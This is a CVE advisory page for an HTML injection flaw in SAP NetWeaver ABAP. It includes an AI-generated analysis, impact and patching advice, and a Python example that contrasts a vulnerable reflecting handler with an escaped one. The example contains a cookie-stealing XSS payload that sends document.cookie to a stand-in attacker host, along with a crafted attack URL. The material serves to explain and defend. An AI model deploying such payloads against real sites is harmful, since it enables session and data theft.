CVE-2025-42945
Description
SAP NetWeaver Application Server ABAP has an HTML injection vulnerability. Due to this, an attacker could craft a URL with malicious script as payload and trick a victim with an active user session into executing it. Upon successful exploit, this vulnerability could lead to limited access to data or its manipulation. There is no impact on availability.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
SAP NetWeaver Application Server ABAP is vulnerable to HTML injection, allowing attackers to craft malicious URLs that can trick authenticated users and lead to limited data access or manipulation.
Vulnerability Analysis
CVE-2025-42945 describes an HTML injection vulnerability in SAP NetWeaver Application Server ABAP. Based on the official description, the root cause is missing output encoding: a value taken from the request URL is reflected into the HTML response without being escaped for its HTML context, so markup or script that an attacker places in the URL is parsed by the victim's browser as part of the page rather than displayed as text. The attacker therefore needs nothing more than a link that looks legitimate but carries the payload in one of its parameters; the description confirms that such a crafted URL with a malicious script payload is the exploitation vector [1].
Exploitation Conditions
To exploit this vulnerability, an attacker must trick an authenticated user into opening the malicious URL, and the user must have an active session with the vulnerable SAP system at that moment; without a session the reflected script has no credentials to act with. No privileges on the SAP system are required for the attacker beyond crafting the link and delivering it (e.g., via email, chat, or a web page). The injection lands in the application's own HTTP response, so the victim's browser executes the injected HTML/script in the origin of the trusted SAP application, with the victim's session cookies attached to any request the script makes [1].
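The mechanism described in the analysis and the exploitation conditions above, as an added illustration that is not SAP's code and not the vulnerable NetWeaver component: a minimal request handler that copies a URL query parameter straight into the HTML it returns, beside the hardened version that HTML-escapes the value first. The parameter name `msg`, the host `sap.example`, the path, and the page layout are assumptions for the example; the attacker URL and payload are constructed for it.

```python
"""Reflected HTML injection: vulnerable handler beside its hardened form.

Added example, not code from SAP NetWeaver. The parameter name `msg`, the
host/path and the page layout are hypothetical; the payload is constructed.
"""
from html import escape
from urllib.parse import parse_qs, quote, urlsplit


def reflected_value(url: str) -> str:
    """Extract the `msg` query parameter exactly as the server would see it
    after percent-decoding (parse_qs undoes the encoding the attacker used)."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return query.get("msg", [""])[0]


def vulnerable_page(url: str) -> str:
    """Reflect the parameter into the page body without any output encoding.

    This is the defect class the CVE describes: whatever the URL carries is
    emitted verbatim, so `<`, `>` and quotes keep their HTML meaning and the
    victim's browser parses attacker markup as part of the trusted page."""
    msg = reflected_value(url)
    return f"<html><body><p>Status: {msg}</p></body></html>"


def hardened_page(url: str) -> str:
    """Same page with the value escaped for an HTML text context.

    quote=True also turns " and ' into entities, so the same helper is safe
    if the value is ever placed inside an attribute as well."""
    msg = reflected_value(url)
    return f"<html><body><p>Status: {escape(msg, quote=True)}</p></body></html>"


def payload_reflected_raw(page: str, payload: str) -> bool:
    """True when the attacker's markup appears verbatim in the response,
    i.e. the browser will parse it as markup rather than render it as text."""
    return payload in page


# Constructed payload: an <img> that fails to load and, in the onerror handler,
# sends the victim's document.cookie to an attacker-controlled host. It runs in
# the SAP application's origin, so it also could issue authenticated requests.
PAYLOAD = "<img src=x onerror=\"fetch('https://attacker.example/?c='+document.cookie)\">"

# The link the victim is lured into clicking. quote(..., safe="") percent-encodes
# every reserved character, including '+', so parse_qs returns PAYLOAD unchanged.
ATTACK_URL = "https://sap.example/app/status?msg=" + quote(PAYLOAD, safe="")


if __name__ == "__main__":
    print("attacker URL:", ATTACK_URL)
    print("vulnerable  :", vulnerable_page(ATTACK_URL))
    print("hardened    :", hardened_page(ATTACK_URL))
```

The escaping step is the whole fix: the hardened handler returns the payload as `&lt;img src=x onerror=&quot;...&quot;&gt;`, which the browser renders as literal text. The ABAP counterpart of `html.escape` is the built-in `escape( val = ... format = cl_abap_format=>e_html_text )`; whether the SAP correction uses exactly that call is not stated in the sources, so treat it as the general remediation pattern rather than a description of the note's patch.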
Impact
Successful exploitation gives the attacker limited access to data, or the ability to manipulate data, within the scope of the victim's session. The impact is confined to confidentiality and integrity, with a CVSS score of 6.1 (Medium); there is no impact on availability. What the injected script can read or change is bounded by the victim's authorizations in the SAP system and by what the affected page exposes, which is why SAP rates both the data access and the manipulation as limited; the script cannot disrupt service [1].
Mitigation
SAP has addressed this vulnerability through its regular Security Patch Day process. The fix is delivered as an SAP Security Note, which should be applied to affected NetWeaver Application Server ABAP systems. SAP recommends implementing the correction promptly, following the standard maintenance strategy for medium-priority notes. As with any ABAP correction note, apply it through the usual channel (transaction SNOTE or the support package that contains it) and confirm afterwards that the note shows as completely implemented on every affected system. For the exact note number and patching instructions, administrators should refer to the SAP Security Notes portal [1].
AI Insight generated on May 19, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products: 1 (SAP NetWeaver Application Server ABAP)
Patches: 0
References: 2
News mentions: 0